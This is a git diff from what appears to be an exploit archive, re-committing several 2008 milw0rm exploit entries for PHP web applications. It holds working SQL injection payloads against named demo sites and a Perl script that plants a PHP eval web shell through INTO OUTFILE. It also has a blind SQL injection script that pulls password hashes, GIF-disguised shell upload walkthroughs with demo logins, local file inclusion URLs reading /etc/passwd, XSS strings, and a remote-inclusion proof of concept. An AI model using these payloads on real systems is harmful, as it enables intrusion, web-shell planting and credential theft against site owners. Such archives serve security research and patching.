-script:Mini Web Calendar, ver. 1.2
-   
-   
-************************************************************************************************************
-download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94
-   
-************************************************************************************************************
-
-
-......................................................................................
-local file xpl:
-   
-http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd
-
-xss xpl:
-
-http://www.site.com/mwcal/php/cal_default.php/>'>
-
-
-
-***************************************************
-***************************************************
-
-Author: ahmadbady from http://www.deltahacking.net
-
-my mail: kivi_hacker666@yahoo.com
-
-
-***************************************************
-
-# milw0rm.com [2008-11-07]
+************************(XSS / FD Vulnerability)**************
+
+script:Mini Web Calendar, ver. 1.2
+   
+   
+************************************************************************************************************
+download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94
+   
+************************************************************************************************************
+
+
+......................................................................................
+local file xpl:
+   
+http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd
+
+xss xpl:
+
+http://www.site.com/mwcal/php/cal_default.php/>'>
+
+
+
+***************************************************
+***************************************************
+
+Author: ahmadbady from http://www.deltahacking.net
+
+my mail: kivi_hacker666@yahoo.com
+
+
+***************************************************
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7050.txt b/platforms/php/webapps/7050.txt
index 4d4ed6c08..143474e22 100755
--- a/platforms/php/webapps/7050.txt
+++ b/platforms/php/webapps/7050.txt
@@ -1,40 +1,40 @@
-e-topbiz Number Links 1 php  ( id ) Remote SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-MaiL : darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script    : http://e-topbiz.com/oprema/pages/numberlinks1.php
-
-_____
-
-ExploiT & Demo
-______________
-
-http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user
-
-(),0x3e,version()),2,3,4,5--
-
-
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-07]
+e-topbiz Number Links 1 php  ( id ) Remote SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+MaiL : darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script    : http://e-topbiz.com/oprema/pages/numberlinks1.php
+
+_____
+
+ExploiT & Demo
+______________
+
+http://e-topbiz.com/trafficdemos/numberlinks1/admin/admin_catalog.php?action=edit&id=-2+union+select+concat(user
+
+(),0x3e,version()),2,3,4,5--
+
+
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7052.txt b/platforms/php/webapps/7052.txt
index 8c25209b2..e7de5efb7 100755
--- a/platforms/php/webapps/7052.txt
+++ b/platforms/php/webapps/7052.txt
@@ -1,35 +1,35 @@
-#################WwW.StarHack.Us#####################
-#
-#   Author : TR-ShaRk
-#
-######################
-#
-#   Web    : StarHack.Us OldKral.Com
-#
-######################
-#
-#   Email   : Admin@tr-shark.org
-#   Msn     : Starhack@tr-shark.org
-#            
-######################
-#
-#   Script   : Domain Seller Pro� v1.5
-#
-######################
-#
-#   SQL Injection Vuln. :
-#
-#   index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
-#
-######################
-#
-#   Demo   :
-
-http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
-#
-#
-#  
-#################WwW.StarHack.Us########################
-Greetz: FataliSt,Webloader,JaCKaL,By-Reis,AranelWorM,RealWolker,DesTRoyeR
-
-# milw0rm.com [2008-11-07]
+#################WwW.StarHack.Us#####################
+#
+#   Author : TR-ShaRk
+#
+######################
+#
+#   Web    : StarHack.Us OldKral.Com
+#
+######################
+#
+#   Email   : Admin@tr-shark.org
+#   Msn     : Starhack@tr-shark.org
+#            
+######################
+#
+#   Script   : Domain Seller Pro� v1.5
+#
+######################
+#
+#   SQL Injection Vuln. :
+#
+#   index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
+#
+######################
+#
+#   Demo   :
+
+http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
+#
+#
+#  
+#################WwW.StarHack.Us########################
+Greetz: FataliSt,Webloader,JaCKaL,By-Reis,AranelWorM,RealWolker,DesTRoyeR
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7057.pl b/platforms/php/webapps/7057.pl
index a03bff82c..ca8bc7816 100755
--- a/platforms/php/webapps/7057.pl
+++ b/platforms/php/webapps/7057.pl
@@ -1,150 +1,150 @@
-#!/usr/bin/perl
-
-=about
-
- MemHT Portal <= 4.0 Perl exploit
-
- AUTHOR:
-	Discovered and written by Ams
-	ax330d [doggy] gmail [dot] com
-
- DESCRIPTION:
-	Here we are able to make SQL-injection due to weak filtering.
-	So, look at inc/inc_header.php lines ~ 74, where hides code
-	$checktitle = (isset($_GET['title'])) ? urldecode(inCode($_GET['title'])) : "" ;
-	We can easily bypass this check. And look again at lines
-	~ 67 in inc/inc_fnctions.php, - this is not that best solution.
-	
-	This exploit provides simple shell.
-
- REQUIREMENTS:
-	MySQL should be able to write to file
-	Know full server path to portal
-	
-=cut
-
-use strict;
-use warnings;
-use IO::Socket;
-
-print "
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	  MemHT portal <= 4.0 Perl exploit
-	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-	";
-
-my $expl_url  = shift or &usage;
-my $serv_path = shift || '-b';
-my $def_shell = '/uploads/file/files.php';
-# 	Simple concept shell
-my $shell = '%253C%253Fphp%2520@eval%2528%2524_GET%255Bcmd%255D%2529%253B';
-
-my @paths = qw(
-	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
-	/home/www  /home/httpd/vhosts
-	/usr/local/apache/htdocs
-	/www/htdocs
-);
-
-@paths = ( $serv_path ) unless $serv_path eq '-b';
-
-exploit( $expl_url );
-
-sub exploit {
-	
-	#	Defining vars.
-	$_ = shift;
-	$_ .= '/' unless substr($_, -1) eq '/';
-	print "\n\tExploiting:\t $_\n";
-	
-	my($packet, $rcvd);
-	my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
-	
-	#	Trying to get /lang/english.php to get server path
-	$packet  = "POST $path/lang/english.php HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-	$rcvd = send_pckt($host, $packet, 1);
-	
-	die "\n\tUnable to connect to $host!\n\n" unless $rcvd;
-	
-	if( $rcvd =~ /Undefined variable:/ ) {
-		@paths = ($rcvd =~ m#\s+in\s+(.*?)${path}lang/english.php#);
-		print "\n\tFound path:\t $paths[-1]\n";
-	} else {
-		print "\n\tStarting bruteforce...\n";
-	}
-	
-	#	Some bruteforce here
-	for $serv_path ( @paths ) {
-		
-		#	Poisoned request
-		my $injection
-			= "page=articles&id=-1&op=readArticle&title=one%2527%2520UNION+SELECT+1%2C2%2C%2527$shell%2527+INTO+OUTFILE+%2527$serv_path$path$def_shell%2527--\%2520";
-		
-		print "\n\tTesting:\t $serv_path$path$def_shell ...\n";
-		$packet  = "GET $path/index.php?$injection HTTP/1.1\r\n";
-		$packet .= "Host: $host\r\n";
-		$packet .= "Connection: Close\r\n";
-		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-		
-		send_pckt($host, $packet, 1) or die "\n\tUnable to connect to http://$host!\n\n";
-	}
-
-	#	Checking for shell presence
-	$packet  = "HEAD $path$def_shell HTTP/1.1\r\n";
-	$packet .= "Host: $host\r\n";
-	$packet .= "Connection: Close\r\n";
-	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
-	
-	$rcvd = send_pckt($host, $packet, 1);
-	if( ! $rcvd) {
-		print "\n\tUnable to connect to $host\n\n";
-		exit;
-	}
-
-	if( $rcvd =~ /200\s+OK/ ) {
-		print "\n\tExploited:\t http://$host$path$def_shell\n\n";
-	} else {
-		print "\n\tExploiting failed.\n\n";
-	}
-	
-}
-
-sub send_pckt() {
-		
-	my $dat;
-	my ($host, $packet, $ret) = @_;
-	my $socket = IO::Socket::INET->new(
-		Proto    => 'tcp',
-		PeerAddr => $host,
-		PeerPort => 80
-	);
-	if( ! $socket) {
-		return 0;
-	} else {
-		
-		print $socket $packet;
-		if( $ret ) {
-			local $/;
-			$dat = <$socket>;
-		}
-		close $socket;
-		return $dat;
-	}
-}
-
-sub usage {
-	print "\n\tUsage:\t$0 http://site.com [-b|full server path]
-
-	By default exlpoit checks /lang/english.php for errors to get real path.
-	If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ).
-
-	Example:\t$0 http://localhost/ /var/www/htdocs
-			$0 http://localhost/ -b
-			$0 http://localhost/\n\n";
-	exit;
-}
-
-# milw0rm.com [2008-11-08]
+#!/usr/bin/perl
+
+=about
+
+ MemHT Portal <= 4.0 Perl exploit
+
+ AUTHOR:
+	Discovered and written by Ams
+	ax330d [doggy] gmail [dot] com
+
+ DESCRIPTION:
+	Here we are able to make SQL-injection due to weak filtering.
+	So, look at inc/inc_header.php lines ~ 74, where hides code
+	$checktitle = (isset($_GET['title'])) ? urldecode(inCode($_GET['title'])) : "" ;
+	We can easily bypass this check. And look again at lines
+	~ 67 in inc/inc_fnctions.php, - this is not that best solution.
+	
+	This exploit provides simple shell.
+
+ REQUIREMENTS:
+	MySQL should be able to write to file
+	Know full server path to portal
+	
+=cut
+
+use strict;
+use warnings;
+use IO::Socket;
+
+print "
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	  MemHT portal <= 4.0 Perl exploit
+	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+	";
+
+my $expl_url  = shift or &usage;
+my $serv_path = shift || '-b';
+my $def_shell = '/uploads/file/files.php';
+# 	Simple concept shell
+my $shell = '%253C%253Fphp%2520@eval%2528%2524_GET%255Bcmd%255D%2529%253B';
+
+my @paths = qw(
+	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
+	/home/www  /home/httpd/vhosts
+	/usr/local/apache/htdocs
+	/www/htdocs
+);
+
+@paths = ( $serv_path ) unless $serv_path eq '-b';
+
+exploit( $expl_url );
+
+sub exploit {
+	
+	#	Defining vars.
+	$_ = shift;
+	$_ .= '/' unless substr($_, -1) eq '/';
+	print "\n\tExploiting:\t $_\n";
+	
+	my($packet, $rcvd);
+	my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
+	
+	#	Trying to get /lang/english.php to get server path
+	$packet  = "POST $path/lang/english.php HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+	$rcvd = send_pckt($host, $packet, 1);
+	
+	die "\n\tUnable to connect to $host!\n\n" unless $rcvd;
+	
+	if( $rcvd =~ /Undefined variable:/ ) {
+		@paths = ($rcvd =~ m#\s+in\s+(.*?)${path}lang/english.php#);
+		print "\n\tFound path:\t $paths[-1]\n";
+	} else {
+		print "\n\tStarting bruteforce...\n";
+	}
+	
+	#	Some bruteforce here
+	for $serv_path ( @paths ) {
+		
+		#	Poisoned request
+		my $injection
+			= "page=articles&id=-1&op=readArticle&title=one%2527%2520UNION+SELECT+1%2C2%2C%2527$shell%2527+INTO+OUTFILE+%2527$serv_path$path$def_shell%2527--\%2520";
+		
+		print "\n\tTesting:\t $serv_path$path$def_shell ...\n";
+		$packet  = "GET $path/index.php?$injection HTTP/1.1\r\n";
+		$packet .= "Host: $host\r\n";
+		$packet .= "Connection: Close\r\n";
+		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+		
+		send_pckt($host, $packet, 1) or die "\n\tUnable to connect to http://$host!\n\n";
+	}
+
+	#	Checking for shell presence
+	$packet  = "HEAD $path$def_shell HTTP/1.1\r\n";
+	$packet .= "Host: $host\r\n";
+	$packet .= "Connection: Close\r\n";
+	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+	
+	$rcvd = send_pckt($host, $packet, 1);
+	if( ! $rcvd) {
+		print "\n\tUnable to connect to $host\n\n";
+		exit;
+	}
+
+	if( $rcvd =~ /200\s+OK/ ) {
+		print "\n\tExploited:\t http://$host$path$def_shell\n\n";
+	} else {
+		print "\n\tExploiting failed.\n\n";
+	}
+	
+}
+
+sub send_pckt() {
+		
+	my $dat;
+	my ($host, $packet, $ret) = @_;
+	my $socket = IO::Socket::INET->new(
+		Proto    => 'tcp',
+		PeerAddr => $host,
+		PeerPort => 80
+	);
+	if( ! $socket) {
+		return 0;
+	} else {
+		
+		print $socket $packet;
+		if( $ret ) {
+			local $/;
+			$dat = <$socket>;
+		}
+		close $socket;
+		return $dat;
+	}
+}
+
+sub usage {
+	print "\n\tUsage:\t$0 http://site.com [-b|full server path]
+
+	By default exlpoit checks /lang/english.php for errors to get real path.
+	If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ).
+
+	Example:\t$0 http://localhost/ /var/www/htdocs
+			$0 http://localhost/ -b
+			$0 http://localhost/\n\n";
+	exit;
+}
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7058.txt b/platforms/php/webapps/7058.txt
index f3476766f..bbbf18a4a 100755
--- a/platforms/php/webapps/7058.txt
+++ b/platforms/php/webapps/7058.txt
@@ -1,63 +1,63 @@
-ZEEPROPERTY v1.0 remote file Upload & XSS
-
-author: ZoRLu msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-dork: "Designed & Developed by Zeeways.com"
-
-
-first register to site 
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-
-after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
-
-add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties 
-
-copy photo link and paste your explorer go your shell
-
-your_shell:
-
-localhost/script_path/companylogo/[id].php
-
-
-example for demo:
-
-user: zeeways
-
-passwd: testing:
-
-change profile direckt link: http://www.zeeproperty.com/viewprofile.php
-
-and your_shell link:
-
-http://www.zeeproperty.com/companylogo/5622365.php
-
-
-XSS for demo:
-
-http://www.zeeproperty.com/view_prop_details.php?propid=">
-
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-08]
+ZEEPROPERTY v1.0 remote file Upload & XSS
+
+author: ZoRLu msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+dork: "Designed & Developed by Zeeways.com"
+
+
+first register to site 
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+
+after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
+
+add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties 
+
+copy photo link and paste your explorer go your shell
+
+your_shell:
+
+localhost/script_path/companylogo/[id].php
+
+
+example for demo:
+
+user: zeeways
+
+passwd: testing:
+
+change profile direckt link: http://www.zeeproperty.com/viewprofile.php
+
+and your_shell link:
+
+http://www.zeeproperty.com/companylogo/5622365.php
+
+
+XSS for demo:
+
+http://www.zeeproperty.com/view_prop_details.php?propid=">
+
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7059.txt b/platforms/php/webapps/7059.txt
index 3f4545243..326401ed9 100755
--- a/platforms/php/webapps/7059.txt
+++ b/platforms/php/webapps/7059.txt
@@ -1,57 +1,57 @@
-########################## www.BugReport.ir #########################
-#
-#      AmnPardaz Security Research Team
-#
-# Title: Enthusiast 3 Remote Code Execution
-# Vendor: http://scripts.indisguise.org/enthusiast/
-# Bug: File Inclusion
-# Vulnerable Version: 3.1.4 (prior versions also may be affected)
-# Exploitation: Remote with browser
-# Fix: N/A
-# Original Advisory: http://www.bugreport.ir/index_57.htm
-###################################################################
-
-
-####################
-- Description:
-####################
-
-Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily
-
-customizable for other types of listings as well?cliques, physical listings, taboo listings, and the like.
-
-
-####################
-- Vulnerability:
-####################
-
-+--> File Inclusion
-
-When register_globals is enabled, Its possible to include arbitrary files from local or remote resources.
-
-####################
-- Code Snippet:
-####################
-/show_joined.php #line:261-264
-
-
    
-Powered by Enthusiast
-
-
    
-
-####################
-- Exploits/POCs:
-####################
-
-POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/ (this one includes show_enthversion.php from evilsite)
-POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00 (this requiers magic_quotes_gpc to be disabled)
-
-####################
-- Credit :
-####################
-AmnPardaz Security Research Team
-Contact: admin[4t}bugreport{d0t]ir
-www.BugReport.ir
-www.AmnPardaz.comz
-
-# milw0rm.com [2008-11-08]
+########################## www.BugReport.ir #########################
+#
+#      AmnPardaz Security Research Team
+#
+# Title: Enthusiast 3 Remote Code Execution
+# Vendor: http://scripts.indisguise.org/enthusiast/
+# Bug: File Inclusion
+# Vulnerable Version: 3.1.4 (prior versions also may be affected)
+# Exploitation: Remote with browser
+# Fix: N/A
+# Original Advisory: http://www.bugreport.ir/index_57.htm
+###################################################################
+
+
+####################
+- Description:
+####################
+
+Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily
+
+customizable for other types of listings as well?cliques, physical listings, taboo listings, and the like.
+
+
+####################
+- Vulnerability:
+####################
+
++--> File Inclusion
+
+When register_globals is enabled, Its possible to include arbitrary files from local or remote resources.
+
+####################
+- Code Snippet:
+####################
+/show_joined.php #line:261-264
+
+
    
+Powered by Enthusiast
+
+
    
+
+####################
+- Exploits/POCs:
+####################
+
+POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/ (this one includes show_enthversion.php from evilsite)
+POC: http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00 (this requiers magic_quotes_gpc to be disabled)
+
+####################
+- Credit :
+####################
+AmnPardaz Security Research Team
+Contact: admin[4t}bugreport{d0t]ir
+www.BugReport.ir
+www.AmnPardaz.comz
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7062.txt b/platforms/php/webapps/7062.txt
index 687dfa31d..0ab02a0c0 100755
--- a/platforms/php/webapps/7062.txt
+++ b/platforms/php/webapps/7062.txt
@@ -1,64 +1,64 @@
-ZEEJOBSITE v2.0 remote file Upload
-
-author: ZoRLu msn: trt-turk@hotmail.com
-
-home: www.z0rlu.blogspot.com
-
-dork: "Copyright-2008@zeejobsite.com"
-
-date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) )
-
-
-first register to site 
-
-you add this code your shell to head 
-
-GIF89a; 
-
-example your_shell.php:
-
-GIF89a;
-
-
-and save your_sheell.php
-
-
-after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
-
-and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
-
-add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties 
-
-copy photo link and paste your explorer go your shell
-
-your_shell:
-
-localhost/script_path/jobseekers/logos/[id].php
-
-
-example for demo:
-
-user: sabrina
-
-passwd: testing:
-
-login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
-
-change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
-
-and your_shell link:
-
-http://zeejobsite.com/jobseekers/logos/7271406.php
-
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-08]
+ZEEJOBSITE v2.0 remote file Upload
+
+author: ZoRLu msn: trt-turk@hotmail.com
+
+home: www.z0rlu.blogspot.com
+
+dork: "Copyright-2008@zeejobsite.com"
+
+date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) )
+
+
+first register to site 
+
+you add this code your shell to head 
+
+GIF89a; 
+
+example your_shell.php:
+
+GIF89a;
+
+
+and save your_sheell.php
+
+
+after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
+
+and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
+
+add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties 
+
+copy photo link and paste your explorer go your shell
+
+your_shell:
+
+localhost/script_path/jobseekers/logos/[id].php
+
+
+example for demo:
+
+user: sabrina
+
+passwd: testing:
+
+login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
+
+change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
+
+and your_shell link:
+
+http://zeejobsite.com/jobseekers/logos/7271406.php
+
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7064.pl b/platforms/php/webapps/7064.pl
index 912f2cba1..41ea3a16f 100755
--- a/platforms/php/webapps/7064.pl
+++ b/platforms/php/webapps/7064.pl
@@ -1,110 +1,110 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use Getopt::Long;
-
-if(!$ARGV[1])
-{
-system("Title Kosova Hackers Group by boom3rang"); 
- print " \n";
- print " #######################################################################\n";
- print "  #   Mambo Component n-form(form_id) Blind SQL Injection Exploit \n";
- print "  # -----------------------------------------------------------\n";
- print "  #   Author: boom3rang [www.khg-crew.ws] \n";
- print "  #   Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n";
- print "  #   Site:   www.khg-crew.ws\n";
- print "  # -----------------------------------------------------------\n";
- print "  #   Dork :   inurl:option=com_n-forms form_id \n";
- print "  #   Usage:   perl exploit.pl host path  \n";
- print "  #   Example: perl exploit.pl www.host.com /path/ -a 3 \n";
- print "  # -----------------------------------------------------------\n";
- print "  #   Options: \n";
- print "  #     -a   valid form id \n";
- print " #######################################################################\n";
- exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $userid  = 1;
-my $aid     = $ARGV[2];
-
-my %options = ();
-GetOptions(\%options, "u=i", "p=s", "a=i");
-
-print "[~] Exploiting...\n";
-
-if($options{"u"})
-{
- $userid = $options{"u"};
-}
-
-if($options{"a"})
-{
- $aid = $options{"a"};
-}
-
-syswrite(STDOUT, "[~] MD5-Hash: ", 14);
-
-for(my $i = 1; $i <= 32; $i++)
-{
- my $f = 0;
- my $h = 48;
- while(!$f && $h <= 57)
- {
-   if(istrue2($host, $path, $userid, $aid, $i, $h))
-   {
-     $f = 1;
-     syswrite(STDOUT, chr($h), 1);
-   }
-   $h++;
- }
- if(!$f)
- {
-   $h = 97;
-   while(!$f && $h <= 122)
-   {
-     if(istrue2($host, $path, $userid, $aid, $i, $h))
-     {
-       $f = 1;
-       syswrite(STDOUT, chr($h), 1);
-     }
-     $h++;
-   }
- }
-}
-
-print "\n[~] Exploiting done\n";
-
-sub istrue2
-{
- my $host  = shift;
- my $path  = shift;
- my $uid   = shift;
- my $aid   = shift;
- my $i     = shift;
- my $h     = shift;
-
- my $ua = LWP::UserAgent->new;
- my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
-
- if($options{"p"})
- {
-   $ua->proxy('http', "http://".$options{"p"});
- }
-
- my $resp = $ua->get($query);
- my $content = $resp->content;
- my $regexp = "Back";
-
- if($content =~ /$regexp/)
- {
-   return 1;
- }
- else
- {
-   return 0;
- }
-
-}
-
-# milw0rm.com [2008-11-08]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+
+if(!$ARGV[1])
+{
+system("Title Kosova Hackers Group by boom3rang"); 
+ print " \n";
+ print " #######################################################################\n";
+ print "  #   Mambo Component n-form(form_id) Blind SQL Injection Exploit \n";
+ print "  # -----------------------------------------------------------\n";
+ print "  #   Author: boom3rang [www.khg-crew.ws] \n";
+ print "  #   Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\n";
+ print "  #   Site:   www.khg-crew.ws\n";
+ print "  # -----------------------------------------------------------\n";
+ print "  #   Dork :   inurl:option=com_n-forms form_id \n";
+ print "  #   Usage:   perl exploit.pl host path  \n";
+ print "  #   Example: perl exploit.pl www.host.com /path/ -a 3 \n";
+ print "  # -----------------------------------------------------------\n";
+ print "  #   Options: \n";
+ print "  #     -a   valid form id \n";
+ print " #######################################################################\n";
+ exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $userid  = 1;
+my $aid     = $ARGV[2];
+
+my %options = ();
+GetOptions(\%options, "u=i", "p=s", "a=i");
+
+print "[~] Exploiting...\n";
+
+if($options{"u"})
+{
+ $userid = $options{"u"};
+}
+
+if($options{"a"})
+{
+ $aid = $options{"a"};
+}
+
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+
+for(my $i = 1; $i <= 32; $i++)
+{
+ my $f = 0;
+ my $h = 48;
+ while(!$f && $h <= 57)
+ {
+   if(istrue2($host, $path, $userid, $aid, $i, $h))
+   {
+     $f = 1;
+     syswrite(STDOUT, chr($h), 1);
+   }
+   $h++;
+ }
+ if(!$f)
+ {
+   $h = 97;
+   while(!$f && $h <= 122)
+   {
+     if(istrue2($host, $path, $userid, $aid, $i, $h))
+     {
+       $f = 1;
+       syswrite(STDOUT, chr($h), 1);
+     }
+     $h++;
+   }
+ }
+}
+
+print "\n[~] Exploiting done\n";
+
+sub istrue2
+{
+ my $host  = shift;
+ my $path  = shift;
+ my $uid   = shift;
+ my $aid   = shift;
+ my $i     = shift;
+ my $h     = shift;
+
+ my $ua = LWP::UserAgent->new;
+ my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
+
+ if($options{"p"})
+ {
+   $ua->proxy('http', "http://".$options{"p"});
+ }
+
+ my $resp = $ua->get($query);
+ my $content = $resp->content;
+ my $regexp = "Back";
+
+ if($content =~ /$regexp/)
+ {
+   return 1;
+ }
+ else
+ {
+   return 0;
+ }
+
+}
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7065.txt b/platforms/php/webapps/7065.txt
index 37c2f2273..ec53db443 100755
--- a/platforms/php/webapps/7065.txt
+++ b/platforms/php/webapps/7065.txt
@@ -1,37 +1,36 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##################################################################
- #  [ Cyberfolio <= 7.12.2 ]  Local File Inclusion Vulnerability  #
- ##################################################################
- #
- # Script site: http://cyberfolio.org/
- # Download: http://cyberfolio.org/Version-7-12-2
- #
- # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
- #      
- # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
- #
- # ...
- #		if (file_exists("./themes/".$_GET[theme].".php")) {
- #		    include_once("./themes/".$_GET[theme].".php"); 		// LFI
- #		    }
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-11-08]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##################################################################
+ #  [ Cyberfolio <= 7.12.2 ]  Local File Inclusion Vulnerability  #
+ ##################################################################
+ #
+ # Script site: http://cyberfolio.org/
+ # Download: http://cyberfolio.org/Version-7-12-2
+ #
+ # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
+ #      
+ # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
+ #
+ # ...
+ #		if (file_exists("./themes/".$_GET[theme].".php")) {
